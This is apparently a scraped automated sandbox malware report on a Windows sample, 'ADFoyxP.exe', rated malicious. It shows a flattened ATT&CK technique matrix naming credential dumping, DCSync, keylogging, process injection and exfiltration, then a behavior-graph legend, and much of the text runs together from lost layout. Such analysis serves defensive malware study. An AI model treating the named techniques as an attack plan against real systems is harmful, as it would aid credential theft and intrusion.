                  Gather Victim Identity Information111
                  Scripting
                  2
                  Valid Accounts
                  231
                  Windows Management Instrumentation
                  111
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter
                  2
                  Valid Accounts
                  1
                  Extra Window Memory Injection
                  12
                  Obfuscated Files or Information
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin Shares21
                  Input Capture
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Scheduled Task/Job
                  2
                  Scheduled Task/Job
                  2
                  Valid Accounts
                  1
                  Software Packing
                  NTDS49
                  System Information Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  2
                  Registry Run Keys / Startup Folder
                  21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  LSA Secrets1
                  Query Registry
                  SSHKeylogging4
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts512
                  Process Injection
                  1
                  Extra Window Memory Injection
                  Cached Domain Credentials361
                  Security Software Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                  Scheduled Task/Job
                  111
                  Masquerading
                  DCSync161
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder
                  2
                  Valid Accounts
                  Proc Filesystem5
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow11
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                  Access Token Manipulation
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Behavior Graph

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  [Behavior graph: ID 1631942, sample ADFoyxP.exe, start date 07/03/2025, architecture WINDOWS, score 100; the graph of processes, dropped files, signatures and network endpoints is rendered as an image in the interactive report]

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.